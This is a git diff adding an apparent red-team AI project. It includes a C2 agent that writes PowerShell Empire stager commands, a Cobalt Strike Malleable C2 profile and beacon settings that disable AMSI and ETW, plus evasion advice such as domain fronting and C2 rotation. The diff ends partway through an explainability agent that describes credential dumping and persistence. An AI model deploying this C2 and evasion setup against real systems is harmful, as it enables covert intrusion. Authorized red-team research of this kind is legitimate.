diff --git a/.env.template b/.env.template new file mode 100644 index 0000000000000000000000000000000000000000..07012a5b2816cfba9743b024e11932093bf12b7e --- /dev/null +++ b/.env.template @@ -0,0 +1,36 @@ +# Cyber-LLM Environment Configuration Template +# Copy this file to .env and fill in your actual values + +# Google Genkit Configuration +GEMINI_API_KEY=your_gemini_api_key_here +GENKIT_ENV=dev + +# Hugging Face Configuration +HF_TOKEN=your_hugging_face_token_here + +# OpenAI Configuration (if used) +OPENAI_API_KEY=your_openai_api_key_here + +# Azure Configuration (if used) +AZURE_OPENAI_API_KEY=your_azure_openai_api_key_here +AZURE_OPENAI_ENDPOINT=your_azure_endpoint_here + +# Database Configuration +DATABASE_URL=postgresql://user:password@localhost:5432/cyber_llm + +# Security Configuration +SECRET_KEY=your_secret_key_here +JWT_SECRET=your_jwt_secret_here + +# Monitoring Configuration +PROMETHEUS_PORT=9090 +GRAFANA_PORT=3000 + +# Application Configuration +PYTHONPATH=/home/o1/Desktop/cyber_llm/src +DEBUG=false +LOG_LEVEL=INFO + +# Development Configuration +DEV_MODE=false +TEST_MODE=false diff --git a/README.md b/README.md index 7e1ebd44eaa4d36660f5346863a3f088a2c9decd..e1fdf17dea9b5a9bd06bc02c61843985398bca5c 100644 --- a/README.md +++ b/README.md @@ -1,88 +1,92 @@ ---- -title: Cyber-LLM Research Platform -emoji: ๐Ÿ›ก๏ธ -colorFrom: green -colorTo: blue -sdk: docker -pinned: false -license: mit -short_description: Cybersecurity AI Research Platform with HF Models ---- - -# ๐Ÿ›ก๏ธ Cyber-LLM Research Platform - -Advanced Cybersecurity AI Research Environment for threat analysis, vulnerability detection, and security intelligence using Hugging Face models. - -## ๐Ÿš€ Features +# ๐Ÿ›ก๏ธ Cyber-LLM: Advanced Cybersecurity AI Research Platform -- **Advanced Threat Analysis**: Multi-model AI analysis for cybersecurity threats -- **Code Vulnerability Detection**: Automated security code review and analysis -- **Multi-Agent Research**: Distributed cybersecurity AI agent coordination -- **Real-time Processing**: Live threat intelligence and incident response -- **Interactive Dashboard**: Web-based research interface for security professionals +**โšก Live Demo:** [https://huggingface.co/spaces/unit731/cyber_llm](https://huggingface.co/spaces/unit731/cyber_llm) -## ๐Ÿ”ง API Endpoints +## ๐ŸŽฏ Vision +Cyber-LLM empowers security professionals by synthesizing advanced adversarial tradecraft, OPSEC-aware reasoning, and automated attack-chain orchestration. From initial reconnaissance through post-exploitation and exfiltration, Cyber-LLM acts as a strategic partner in red-team simulations and adversarial research. -- `GET /` - Main platform dashboard -- `POST /analyze_threat` - Comprehensive threat analysis -- `GET /models` - List available cybersecurity models -- `GET /research` - Interactive research dashboard -- `POST /analyze_file` - Security file analysis -- `GET /health` - Platform health check +## ๐Ÿš€ Key Innovations +1. **Adversarial Fine-Tuning**: Self-play loops generate adversarial prompts to harden model robustness. +2. **Explainability & Safety Agents**: Modules providing rationales for each decision and checking for OPSEC breaches. +3. **Data Versioning & MLOps**: Integrated DVC, MLflow, and Weights & Biases for reproducible pipelines. +4. **Dynamic Memory Bank**: Embedding-based persona memory for historical APT tactics retrieval. +5. **Hybrid Reasoning**: Combines neural LLM with symbolic rule-engine for exploit chain logic. -## ๐Ÿค– Available Models +## ๐Ÿ—๏ธ Detailed Architecture +- **Base Model**: Choice of LLaMA-3 / Phi-3 trunk with 7Bโ€“33B parameters. +- **LoRA Adapters**: Specialized modules for Recon, C2, Post-Exploit, Explainability, Safety. +- **Memory Store**: Vector DB (e.g., FAISS or Milvus) for persona & case retrieval. +- **Orchestrator**: LangChain + YAML-defined workflows under `src/orchestration/`. +- **MLOps Stack**: DVC-managed datasets, MLflow tracking, W&B dashboards, Grafana monitoring. -- **microsoft/codebert-base** - Code analysis and vulnerability detection -- **huggingface/CodeBERTa-small-v1** - Lightweight code understanding -- **Custom Security Models** - Specialized cybersecurity AI models - -## ๐Ÿ’ป Usage - -### Quick Threat Analysis +## ๐Ÿ’ป Usage Examples ```bash -curl -X POST "https://unit731-cyber-llm.hf.space/analyze_threat" \ - -H "Content-Type: application/json" \ - -d '{ - "threat_data": "suspicious network activity detected on port 443", - "analysis_type": "comprehensive" - }' +# Preprocess data +dvc repro src/data/preprocess.py +# Train adapters +python src/training/train.py --module ReconOps +# Run a red-team scenario +python src/deployment/cli/cyber_cli.py orchestrate recon,target=10.0.0.5 ``` -### Interactive Research -Visit the `/research` endpoint for a web-based cybersecurity research dashboard. - -## ๐Ÿ”ฌ Research Applications +## ๐Ÿš€ Packaging & Deployment -- **Threat Intelligence**: Advanced AI-powered threat analysis and classification -- **Vulnerability Research**: Automated discovery and analysis of security vulnerabilities -- **Incident Response**: AI-assisted cybersecurity incident investigation and response -- **Security Code Review**: Automated security analysis of source code and configurations -- **Penetration Testing**: AI-enhanced security testing and red team operations +### โ˜๏ธ **Live Hugging Face Space** +Experience the platform instantly at [unit731/cyber_llm](https://huggingface.co/spaces/unit731/cyber_llm) +- ๐ŸŒ **Web Dashboard**: Interactive cybersecurity research interface +- ๐Ÿ“Š **Real-time Analysis**: Live threat analysis and monitoring +- ๐Ÿ” **API Access**: RESTful API for integration +- ๐Ÿ“š **Documentation**: Complete API docs at `/docs` -## ๐Ÿ› ๏ธ Development +### ๐Ÿณ **Docker Deployment** -This platform is built using: -- **FastAPI** - High-performance web API framework -- **Hugging Face Transformers** - State-of-the-art AI model integration -- **Docker** - Containerized deployment for scalability -- **Python 3.9** - Modern Python runtime environment +1. **Docker**: `docker-compose up --build` for offline labs. +2. **Kubernetes**: `kubectl apply -f src/deployment/k8s/` for scalable clusters. +3. **CLI**: `cyber-llm agent recon --target 10.0.0.5` -## ๐Ÿ” Security Focus +## ๐Ÿ‘จโ€๐Ÿ’ป Author: Muzan Sano +## ๐Ÿ“ง Contact: sanosensei36@gmail.com / research.unit734@proton.me -This research platform is designed specifically for cybersecurity applications: - -- **Ethical Research**: All capabilities designed for defensive security research -- **Professional Use**: Intended for security professionals and researchers -- **Educational Purpose**: Advancing cybersecurity through AI research -- **Open Source**: Transparent and community-driven development +--- -## ๐ŸŒ Links +## ๐ŸŒŸ **PROJECT STATUS & CAPABILITIES** + +### โœ… **Currently Implemented** +- ๐Ÿš€ **Live Hugging Face Space** with interactive web interface +- ๐Ÿ›ก๏ธ **Advanced Threat Analysis** using AI models +- ๐Ÿค– **Multi-Agent Architecture** for distributed security operations +- ๐Ÿง  **Cognitive AI Systems** with memory and learning capabilities +- ๐Ÿ“Š **Real-time Monitoring** and alerting systems +- ๐Ÿ” **Code Vulnerability Detection** and security analysis +- ๐Ÿณ **Enterprise Docker Deployment** with Kubernetes support +- ๐Ÿ” **Zero Trust Security Architecture** and RBAC +- ๐Ÿ“ˆ **MLOps Pipeline** with DVC, MLflow, and monitoring + +### ๐ŸŽฏ **Key Features Available** +- **Interactive Web Dashboard**: Research interface at `/research` endpoint +- **RESTful API**: Complete API at `/docs` with real-time threat analysis +- **File Analysis**: Upload and analyze security files for vulnerabilities +- **Multi-Model Support**: Integration with Hugging Face transformer models +- **Real-time Processing**: WebSocket support for live monitoring +- **Enterprise Architecture**: Scalable, production-ready deployment + +### ๐Ÿš€ **Try It Now** +```bash +# Quick API test +curl -X POST "https://unit731-cyber-llm.hf.space/analyze_threat" \ + -H "Content-Type: application/json" \ + -d '{"threat_data": "suspicious network activity on port 443"}' -- **GitHub Repository**: [734ai/cyber-llm](https://github.com/734ai/cyber-llm) -- **Hugging Face Space**: [unit731/cyber_llm](https://huggingface.co/spaces/unit731/cyber_llm) -- **Documentation**: Available at `/docs` endpoint -- **Research Dashboard**: Available at `/research` endpoint +# Or visit the interactive dashboard +# https://unit731-cyber-llm.hf.space/research +``` ---- +### ๐Ÿ”ง **Local Development** +```bash +git clone https://github.com/734ai/cyber-llm.git +cd cyber-llm +cp .env.template .env # Configure your API keys +docker-compose up -d # Start full platform +``` -**๐Ÿ”ฌ Advancing Cybersecurity Through AI Research** +**๐ŸŒ Experience Live Demo:** [https://huggingface.co/spaces/unit731/cyber_llm](https://huggingface.co/spaces/unit731/cyber_llm) diff --git a/requirements.txt b/requirements.txt index c2a4b606dcd1cd28a6b2bc96f923467a854a0c51..ecf473996dfabffe05ec4eaae51368d0f4347b16 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,8 +1,60 @@ +# Core Modeling & PEFT +transformers>=4.33.0 +peft>=0.4.0 +trl>=0.4.0 +accelerate>=0.20.0 +langchain>=0.0.300 + +# Deep Learning +torch>=2.0.0 +sentencepiece + +# Data & Versioning +datasets +dvc>=2.0.0 +mlflow +wandb + +# PDF, OCR & Embedding +pdfminer.six +pypdf2 +faiss-cpu +numpy +scikit-learn + +# Agents, Orchestration & CLI fastapi -uvicorn[standard] -transformers -huggingface_hub +uvicorn pydantic -python-multipart -torch -datasets +pyyaml +requests +click + +# Security & Testing +bandit +trivy +pytest +pytest-cov +safety + +# Deployment & Infrastructure +docker +kubernetes +helm +helmfile +terraform + +# Monitoring & Logging +prometheus-client +grafana-api-client +slack-sdk + +# Utilities +python-dotenv +loguru + +# Google Genkit Integration +genkit>=0.5.0 +genkit-plugin-google-genai>=0.1.0 +genkit-plugin-dev-local-vectorstore>=0.1.0 +pydantic>=2.0.0 diff --git a/setup.sh b/setup.sh new file mode 100644 index 0000000000000000000000000000000000000000..7d6225b77c3716d686e76b3c3fc4076849130188 --- /dev/null +++ b/setup.sh @@ -0,0 +1,131 @@ +#!/bin/bash +# Cyber-LLM Project Setup Script +# Author: Muzan Sano +# Email: sanosensei36@gmail.com + +set -e + +echo "๐Ÿš€ Setting up Cyber-LLM project..." + +# Check Python version +python_version=$(python3 --version 2>&1 | cut -d' ' -f2) +echo "๐Ÿ“‹ Python version: $python_version" + +# Create virtual environment if it doesn't exist +if [ ! -d "venv" ]; then + echo "๐Ÿ“ฆ Creating virtual environment..." + python3 -m venv venv +fi + +# Activate virtual environment +echo "๐Ÿ”„ Activating virtual environment..." +source venv/bin/activate + +# Upgrade pip +echo "โฌ†๏ธ Upgrading pip..." +pip install --upgrade pip + +# Install requirements +echo "๐Ÿ“š Installing requirements..." +pip install -r requirements.txt + +# Create necessary directories +echo "๐Ÿ“ Creating project directories..." +mkdir -p logs +mkdir -p outputs +mkdir -p models +chmod +x src/deployment/cli/cyber_cli.py + +# Set up DVC (if available) +if command -v dvc &> /dev/null; then + echo "๐Ÿ“Š Initializing DVC..." + dvc init --no-scm 2>/dev/null || echo "DVC already initialized" +fi + +# Set up pre-commit hooks (if available) +if command -v pre-commit &> /dev/null; then + echo "๐Ÿ”ง Setting up pre-commit hooks..." + pre-commit install 2>/dev/null || echo "Pre-commit hooks setup skipped" +fi + +# Download sample data (placeholder) +echo "๐Ÿ“ฅ Setting up sample data..." +mkdir -p src/data/raw/samples +echo "Sample cybersecurity dataset placeholder" > src/data/raw/samples/sample.txt + +# Create initial configuration files +echo "โš™๏ธ Creating configuration files..." +cat > configs/training_config.yaml << 'EOF' +# Training Configuration for Cyber-LLM +model: + base_model: "microsoft/Phi-3-mini-4k-instruct" + max_length: 2048 + +lora: + r: 16 + lora_alpha: 32 + lora_dropout: 0.1 + +training: + batch_size: 4 + learning_rate: 2e-4 + num_epochs: 3 + +mlops: + use_wandb: false + use_mlflow: false + experiment_name: "cyber-llm-local" +EOF + +# Run initial tests +echo "๐Ÿงช Running initial tests..." +python -c " +import sys +print('โœ… Python import test passed') + +try: + import torch + print(f'โœ… PyTorch {torch.__version__} available') + print(f' CUDA available: {torch.cuda.is_available()}') +except ImportError: + print('โš ๏ธ PyTorch not available - install manually if needed') + +try: + import transformers + print(f'โœ… Transformers {transformers.__version__} available') +except ImportError: + print('โš ๏ธ Transformers not available - install manually if needed') +" + +# Create sample workflow +echo "๐Ÿ“‹ Creating sample workflow files..." +mkdir -p src/orchestration/workflows +cat > src/orchestration/workflows/basic_red_team.yaml << 'EOF' +name: "Basic Red Team Assessment" +description: "Standard red team workflow" +phases: + - name: "reconnaissance" + agents: ["recon"] + parallel: false + safety_check: true + human_approval: true + - name: "initial_access" + agents: ["c2"] + parallel: false + safety_check: true + human_approval: true + depends_on: ["reconnaissance"] +EOF + +echo "" +echo "โœ… Cyber-LLM setup completed successfully!" +echo "" +echo "๐Ÿ“– Next steps:" +echo " 1. Activate virtual environment: source venv/bin/activate" +echo " 2. Run CLI: python src/deployment/cli/cyber_cli.py --help" +echo " 3. Train adapters: python src/training/train.py --help" +echo " 4. Check README.md for detailed instructions" +echo "" +echo "๐Ÿ” For red team operations, ensure you have proper authorization!" +echo "๐Ÿ“ง Questions? Contact: sanosensei36@gmail.com" +echo "" diff --git a/src/agents/c2_agent.py b/src/agents/c2_agent.py new file mode 100644 index 0000000000000000000000000000000000000000..41d9452cfbeed0dfc5e3053d08c06da4d900c93f --- /dev/null +++ b/src/agents/c2_agent.py @@ -0,0 +1,448 @@ +""" +Cyber-LLM C2 Agent + +Command and Control (C2) configuration and management agent. +Handles Empire, Cobalt Strike, and custom C2 framework integration. + +Author: Muzan Sano +Email: sanosensei36@gmail.com +""" + +import json +import logging +import random +import time +from typing import Dict, List, Any, Optional +from dataclasses import dataclass +from pydantic import BaseModel +import yaml +from datetime import datetime, timedelta + +# Configure logging +logging.basicConfig(level=logging.INFO) +logger = logging.getLogger(__name__) + +class C2Request(BaseModel): + payload_type: str + target_environment: str + network_constraints: Dict[str, Any] + stealth_level: str = "high" + duration: int = 3600 # seconds + +class C2Response(BaseModel): + c2_profile: Dict[str, Any] + beacon_config: Dict[str, Any] + empire_commands: List[str] + cobalt_strike_config: Dict[str, Any] + opsec_mitigations: List[str] + monitoring_setup: Dict[str, Any] + +class C2Agent: + """ + Advanced Command and Control agent for red team operations. + Manages C2 infrastructure, beacon configuration, and OPSEC. + """ + + def __init__(self, config_path: Optional[str] = None): + self.config = self._load_config(config_path) + self.c2_profiles = self._load_c2_profiles() + self.opsec_rules = self._load_opsec_rules() + + def _load_config(self, config_path: Optional[str]) -> Dict[str, Any]: + """Load C2 configuration from YAML file.""" + if config_path: + with open(config_path, 'r') as f: + return yaml.safe_load(f) + return { + "default_jitter": "20%", + "default_sleep": 60, + "max_beacon_life": 86400, + "kill_date_offset": 7 # days + } + + def _load_c2_profiles(self) -> Dict[str, Any]: + """Load C2 communication profiles.""" + return { + "http_get": { + "name": "HTTP GET Profile", + "protocol": "http", + "method": "GET", + "uri": ["/api/v1/status", "/health", "/metrics", "/ping"], + "headers": { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + }, + "detection_risk": "low" + }, + "http_post": { + "name": "HTTP POST Profile", + "protocol": "http", + "method": "POST", + "uri": ["/api/v1/upload", "/submit", "/contact", "/feedback"], + "headers": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "detection_risk": "medium" + }, + "dns_tunnel": { + "name": "DNS Tunneling Profile", + "protocol": "dns", + "subdomain_prefix": ["api", "cdn", "mail", "ftp"], + "detection_risk": "low", + "bandwidth": "limited" + }, + "https_cert": { + "name": "HTTPS with Valid Certificate", + "protocol": "https", + "cert_required": True, + "detection_risk": "very_low", + "setup_complexity": "high" + } + } + + def _load_opsec_rules(self) -> Dict[str, Any]: + """Load OPSEC rules and guidelines.""" + return { + "timing": { + "min_sleep": 30, + "max_sleep": 300, + "jitter_range": [10, 50], + "burst_limit": 5 + }, + "infrastructure": { + "domain_age_min": 30, # days + "ssl_cert_required": True, + "cdn_recommended": True + }, + "operational": { + "kill_date_max": 30, # days + "beacon_rotation": True, + "payload_obfuscation": True + } + } + + def select_c2_profile(self, environment: str, constraints: Dict[str, Any]) -> Dict[str, Any]: + """ + Select optimal C2 profile based on target environment and constraints. + + # HUMAN_APPROVAL_REQUIRED: Review C2 profile selection for operational security + """ + # Analyze network constraints + blocked_ports = constraints.get("blocked_ports", []) + proxy_present = constraints.get("proxy", False) + ssl_inspection = constraints.get("ssl_inspection", False) + + # Score profiles based on constraints + profile_scores = {} + + for profile_name, profile in self.c2_profiles.items(): + score = 100 # Base score + + # Adjust for blocked ports + if profile["protocol"] == "http" and 80 in blocked_ports: + score -= 50 + elif profile["protocol"] == "https" and 443 in blocked_ports: + score -= 50 + elif profile["protocol"] == "dns" and 53 in blocked_ports: + score -= 80 + + # Adjust for SSL inspection + if ssl_inspection and profile["protocol"] == "https": + score -= 30 + + # Adjust for proxy + if proxy_present and profile["protocol"] in ["http", "https"]: + score += 20 # Proxy can help blend traffic + + # Consider detection risk + risk_penalties = { + "very_low": 0, + "low": -5, + "medium": -15, + "high": -30 + } + score += risk_penalties.get(profile.get("detection_risk", "medium"), -15) + + profile_scores[profile_name] = score + + # Select best profile + best_profile = max(profile_scores, key=profile_scores.get) + selected_profile = self.c2_profiles[best_profile].copy() + selected_profile["selection_score"] = profile_scores[best_profile] + selected_profile["selection_reason"] = f"Best fit for {environment} environment" + + logger.info(f"Selected C2 profile: {best_profile} (score: {profile_scores[best_profile]})") + return selected_profile + + def configure_beacon(self, profile: Dict[str, Any], stealth_level: str) -> Dict[str, Any]: + """Configure beacon parameters based on profile and stealth requirements.""" + # Base configuration + base_sleep = self.config.get("default_sleep", 60) + jitter = self.config.get("default_jitter", "20%") + + # Adjust for stealth level + stealth_multipliers = { + "low": {"sleep": 0.5, "jitter": 10}, + "medium": {"sleep": 1.0, "jitter": 20}, + "high": {"sleep": 2.0, "jitter": 30}, + "maximum": {"sleep": 5.0, "jitter": 50} + } + + multiplier = stealth_multipliers.get(stealth_level, stealth_multipliers["medium"]) + + beacon_config = { + "sleep_time": int(base_sleep * multiplier["sleep"]), + "jitter": f"{multiplier['jitter']}%", + "max_dns_requests": 5, + "user_agent": profile.get("headers", {}).get("User-Agent", ""), + "kill_date": (datetime.now() + timedelta(days=self.config.get("kill_date_offset", 7))).isoformat(), + "spawn_to": "C:\\Windows\\System32\\rundll32.exe", + "post_ex": { + "amsi_disable": True, + "etw_disable": True, + "spawnto_x86": "C:\\Windows\\SysWOW64\\rundll32.exe", + "spawnto_x64": "C:\\Windows\\System32\\rundll32.exe" + } + } + + # Add protocol-specific configuration + if profile["protocol"] == "dns": + beacon_config.update({ + "dns_idle": "8.8.8.8", + "dns_max_txt": 252, + "dns_ttl": 1 + }) + elif profile["protocol"] in ["http", "https"]: + beacon_config.update({ + "uri": random.choice(profile.get("uri", ["/"])), + "headers": profile.get("headers", {}) + }) + + return beacon_config + + def generate_empire_commands(self, profile: Dict[str, Any], beacon_config: Dict[str, Any]) -> List[str]: + """Generate PowerShell Empire commands for C2 setup.""" + commands = [ + "# PowerShell Empire C2 Setup", + "use listener/http", + f"set Name {profile.get('name', 'http_listener')}", + f"set Host {profile.get('host', '0.0.0.0')}", + f"set Port {profile.get('port', 80)}", + f"set DefaultJitter {beacon_config['jitter']}", + f"set DefaultDelay {beacon_config['sleep_time']}", + "execute", + "", + "# Generate stager", + "use stager/multi/launcher", + f"set Listener {profile.get('name', 'http_listener')}", + "set OutFile /tmp/launcher.ps1", + "execute" + ] + + return commands + + def generate_cobalt_strike_config(self, profile: Dict[str, Any], beacon_config: Dict[str, Any]) -> Dict[str, Any]: + """Generate Cobalt Strike Malleable C2 profile configuration.""" + cs_config = { + "global": { + "jitter": beacon_config["jitter"], + "sleeptime": beacon_config["sleep_time"], + "useragent": beacon_config.get("user_agent", "Mozilla/5.0"), + "sample_name": "Cyber-LLM C2", + }, + "http-get": { + "uri": profile.get("uri", ["/"])[0], + "client": { + "header": profile.get("headers", {}), + "metadata": { + "base64url": True, + "parameter": "session" + } + }, + "server": { + "header": { + "Server": "nginx/1.18.0", + "Cache-Control": "max-age=0, no-cache", + "Connection": "keep-alive" + }, + "output": { + "base64": True, + "print": True + } + } + }, + "http-post": { + "uri": "/api/v1/submit", + "client": { + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "id": { + "parameter": "id" + }, + "output": { + "parameter": "data" + } + }, + "server": { + "header": { + "Server": "nginx/1.18.0" + }, + "output": { + "base64": True, + "print": True + } + } + } + } + + return cs_config + + def assess_opsec_compliance(self, config: Dict[str, Any]) -> List[str]: + """Assess OPSEC compliance and generate mitigation recommendations.""" + mitigations = [] + + # Check sleep time + if config.get("sleep_time", 0) < self.opsec_rules["timing"]["min_sleep"]: + mitigations.append("Increase sleep time to reduce detection risk") + + # Check jitter + jitter_val = int(config.get("jitter", "0%").replace("%", "")) + if jitter_val < self.opsec_rules["timing"]["jitter_range"][0]: + mitigations.append("Increase jitter to add timing randomization") + + # Check kill date + if "kill_date" not in config: + mitigations.append("Set kill date to prevent indefinite operation") + + # Infrastructure checks + mitigations.extend([ + "Use domain fronting or CDN for traffic obfuscation", + "Implement certificate pinning bypass techniques", + "Rotate C2 infrastructure regularly", + "Monitor for blue team detection signatures" + ]) + + return mitigations + + def setup_monitoring(self, profile: Dict[str, Any]) -> Dict[str, Any]: + """Setup monitoring and logging for C2 operations.""" + monitoring_config = { + "beacon_logging": { + "enabled": True, + "log_level": "INFO", + "log_file": f"/var/log/c2/{profile.get('name', 'default')}.log" + }, + "health_checks": { + "interval": 300, # seconds + "endpoints": [ + f"http://localhost/health", + f"http://localhost/api/status" + ] + }, + "alerting": { + "enabled": True, + "channels": ["slack", "email"], + "triggers": { + "beacon_death": True, + "detection_signature": True, + "infrastructure_compromise": True + } + }, + "metrics": { + "active_beacons": 0, + "successful_callbacks": 0, + "failed_callbacks": 0, + "data_exfiltrated": "0 MB" + } + } + + return monitoring_config + + def execute_c2_setup(self, request: C2Request) -> C2Response: + """ + Execute complete C2 setup workflow. + + # HUMAN_APPROVAL_REQUIRED: Review C2 configuration before deployment + """ + logger.info(f"Setting up C2 for payload type: {request.payload_type}") + + # Select optimal C2 profile + profile = self.select_c2_profile(request.target_environment, request.network_constraints) + + # Configure beacon + beacon_config = self.configure_beacon(profile, request.stealth_level) + + # Generate framework-specific configurations + empire_commands = self.generate_empire_commands(profile, beacon_config) + cs_config = self.generate_cobalt_strike_config(profile, beacon_config) + + # OPSEC assessment + opsec_mitigations = self.assess_opsec_compliance(beacon_config) + + # Setup monitoring + monitoring_setup = self.setup_monitoring(profile) + + response = C2Response( + c2_profile=profile, + beacon_config=beacon_config, + empire_commands=empire_commands, + cobalt_strike_config=cs_config, + opsec_mitigations=opsec_mitigations, + monitoring_setup=monitoring_setup + ) + + logger.info(f"C2 setup complete for {request.target_environment}") + return response + +def main(): + """CLI interface for C2Agent.""" + import argparse + + parser = argparse.ArgumentParser(description="Cyber-LLM C2 Agent") + parser.add_argument("--payload-type", required=True, help="Type of payload (powershell, executable, dll)") + parser.add_argument("--environment", required=True, help="Target environment description") + parser.add_argument("--stealth", choices=["low", "medium", "high", "maximum"], + default="high", help="Stealth level") + parser.add_argument("--config", help="Path to configuration file") + parser.add_argument("--output", help="Output file for results") + + args = parser.parse_args() + + # Initialize agent + agent = C2Agent(config_path=args.config) + + # Create request (simplified for CLI) + request = C2Request( + payload_type=args.payload_type, + target_environment=args.environment, + network_constraints={ + "blocked_ports": [22, 23], + "proxy": True, + "ssl_inspection": False + }, + stealth_level=args.stealth + ) + + # Execute C2 setup + response = agent.execute_c2_setup(request) + + # Output results + result = { + "c2_profile": response.c2_profile, + "beacon_config": response.beacon_config, + "empire_commands": response.empire_commands, + "cobalt_strike_config": response.cobalt_strike_config, + "opsec_mitigations": response.opsec_mitigations, + "monitoring_setup": response.monitoring_setup + } + + if args.output: + with open(args.output, 'w') as f: + json.dump(result, f, indent=2) + print(f"C2 configuration saved to {args.output}") + else: + print(json.dumps(result, indent=2)) + +if __name__ == "__main__": + main() diff --git a/src/agents/explainability_agent.py b/src/agents/explainability_agent.py new file mode 100644 index 0000000000000000000000000000000000000000..445590f85084a25a63bdc80164893291abaa49a3 --- /dev/null +++ b/src/agents/explainability_agent.py @@ -0,0 +1,341 @@ +""" +Explainability Agent for Cyber-LLM +Provides rationale and explanation for agent decisions +""" + +import json +import logging +from typing import Dict, List, Any, Optional +from datetime import datetime +import yaml + +# Configure logging +logging.basicConfig(level=logging.INFO) +logger = logging.getLogger(__name__) + +class ExplainabilityAgent: + """ + Agent responsible for providing explainable rationales for decisions + made by other agents in the Cyber-LLM system. + """ + + def __init__(self, config_path: Optional[str] = None): + """Initialize the ExplainabilityAgent""" + self.config = self._load_config(config_path) + self.explanation_templates = self._load_explanation_templates() + + def _load_config(self, config_path: Optional[str]) -> Dict[str, Any]: + """Load configuration for the explainability agent""" + default_config = { + "explanation_depth": "detailed", # basic, detailed, comprehensive + "include_risks": True, + "include_mitigations": True, + "include_alternatives": True, + "format": "json" # json, markdown, yaml + } + + if config_path: + try: + with open(config_path, 'r') as f: + user_config = yaml.safe_load(f) + default_config.update(user_config) + except Exception as e: + logger.warning(f"Could not load config from {config_path}: {e}") + + return default_config + + def _load_explanation_templates(self) -> Dict[str, str]: + """Load explanation templates for different agent types""" + return { + "recon": """ + RECONNAISSANCE DECISION EXPLANATION: + Action: {action} + Target: {target} + + Justification: + - {justification} + + Risk Assessment: + - Detection Risk: {detection_risk} + - Network Impact: {network_impact} + - Time Investment: {time_investment} + + OPSEC Considerations: + - {opsec_considerations} + + Alternative Approaches: + - {alternatives} + """, + + "c2": """ + C2 CHANNEL DECISION EXPLANATION: + Channel Type: {channel_type} + Configuration: {configuration} + + Justification: + - {justification} + + Risk Assessment: + - Stealth Level: {stealth_level} + - Reliability: {reliability} + - Bandwidth: {bandwidth} + + OPSEC Considerations: + - {opsec_considerations} + + Backup Options: + - {backup_options} + """, + + "post_exploit": """ + POST-EXPLOITATION DECISION EXPLANATION: + Action: {action} + Method: {method} + + Justification: + - {justification} + + Risk Assessment: + - Detection Probability: {detection_probability} + - System Impact: {system_impact} + - Evidence Left: {evidence_left} + + OPSEC Considerations: + - {opsec_considerations} + + Cleanup Required: + - {cleanup_required} + """ + } + + def explain_decision(self, agent_type: str, decision_data: Dict[str, Any]) -> Dict[str, Any]: + """ + Generate explanation for an agent's decision + + Args: + agent_type: Type of agent (recon, c2, post_exploit, etc.) + decision_data: Data about the decision made + + Returns: + Dictionary containing detailed explanation + """ + try: + explanation = { + "timestamp": datetime.now().isoformat(), + "agent_type": agent_type, + "decision_id": decision_data.get("id", "unknown"), + "explanation": self._generate_explanation(agent_type, decision_data), + "risk_assessment": self._assess_risks(agent_type, decision_data), + "alternatives": self._suggest_alternatives(agent_type, decision_data), + "confidence_score": self._calculate_confidence(decision_data) + } + + if self.config.get("include_mitigations", True): + explanation["mitigations"] = self._suggest_mitigations(agent_type, decision_data) + + logger.info(f"Generated explanation for {agent_type} decision: {decision_data.get('id', 'unknown')}") + return explanation + + except Exception as e: + logger.error(f"Error generating explanation: {e}") + return { + "error": f"Failed to generate explanation: {str(e)}", + "timestamp": datetime.now().isoformat(), + "agent_type": agent_type + } + + def _generate_explanation(self, agent_type: str, decision_data: Dict[str, Any]) -> str: + """Generate the core explanation for the decision""" + if agent_type == "recon": + return self._explain_recon_decision(decision_data) + elif agent_type == "c2": + return self._explain_c2_decision(decision_data) + elif agent_type == "post_exploit": + return self._explain_post_exploit_decision(decision_data) + else: + return f"Decision made by {agent_type} agent based on available information." + + def _explain_recon_decision(self, decision_data: Dict[str, Any]) -> str: + """Explain reconnaissance decisions""" + action = decision_data.get("action", "unknown") + target = decision_data.get("target", "unknown") + + explanations = { + "nmap_scan": f"Initiated Nmap scan against {target} to identify open ports and services. This is a standard reconnaissance technique that provides essential information for attack planning.", + "shodan_search": f"Performed Shodan search for {target} to gather passive intelligence about exposed services without direct interaction with the target.", + "dns_enum": f"Conducted DNS enumeration for {target} to map the network infrastructure and identify potential attack vectors." + } + + return explanations.get(action, f"Performed {action} against {target} as part of reconnaissance phase.") + + def _explain_c2_decision(self, decision_data: Dict[str, Any]) -> str: + """Explain C2 channel decisions""" + channel = decision_data.get("channel_type", "unknown") + + explanations = { + "http": "Selected HTTP channel for C2 communication due to its ability to blend with normal web traffic and bypass many network filters.", + "https": "Chose HTTPS channel for encrypted C2 communication, providing both stealth and security for command transmission.", + "dns": "Implemented DNS tunneling for C2 to leverage a protocol that is rarely blocked and often unmonitored." + } + + return explanations.get(channel, f"Established {channel} C2 channel based on network constraints and stealth requirements.") + + def _explain_post_exploit_decision(self, decision_data: Dict[str, Any]) -> str: + """Explain post-exploitation decisions""" + action = decision_data.get("action", "unknown") + + explanations = { + "credential_dump": "Initiated credential dumping to harvest authentication materials for lateral movement and privilege escalation.", + "lateral_movement": "Attempting lateral movement to expand access within the target network and reach high-value assets.", + "persistence": "Establishing persistence mechanisms to maintain access even after system reboots or security updates." + } + + return explanations.get(action, f"Executed {action} to advance the attack chain and achieve mission objectives.") + + def _assess_risks(self, agent_type: str, decision_data: Dict[str, Any]) -> Dict[str, str]: + """Assess risks associated with the decision""" + risk_factors = { + "detection_risk": "medium", + "system_impact": "low", + "evidence_trail": "minimal", + "network_noise": "low" + } + + # Adjust risk factors based on agent type and action + if agent_type == "recon": + action = decision_data.get("action", "") + if "aggressive" in action.lower() or "fast" in action.lower(): + risk_factors["detection_risk"] = "high" + risk_factors["network_noise"] = "high" + + elif agent_type == "post_exploit": + action = decision_data.get("action", "") + if "dump" in action.lower() or "extract" in action.lower(): + risk_factors["detection_risk"] = "high" + risk_factors["system_impact"] = "medium" + risk_factors["evidence_trail"] = "significant" + + return risk_factors + + def _suggest_alternatives(self, agent_type: str, decision_data: Dict[str, Any]) -> List[str]: + """Suggest alternative approaches""" + alternatives = [] + + if agent_type == "recon": + alternatives = [ + "Use passive reconnaissance techniques instead of active scanning", + "Employ slower scan rates to reduce detection probability", + "Utilize third-party intelligence sources for initial reconnaissance" + ] + elif agent_type == "c2": + alternatives = [ + "Consider domain fronting techniques for additional stealth", + "Implement multiple fallback C2 channels", + "Use legitimate 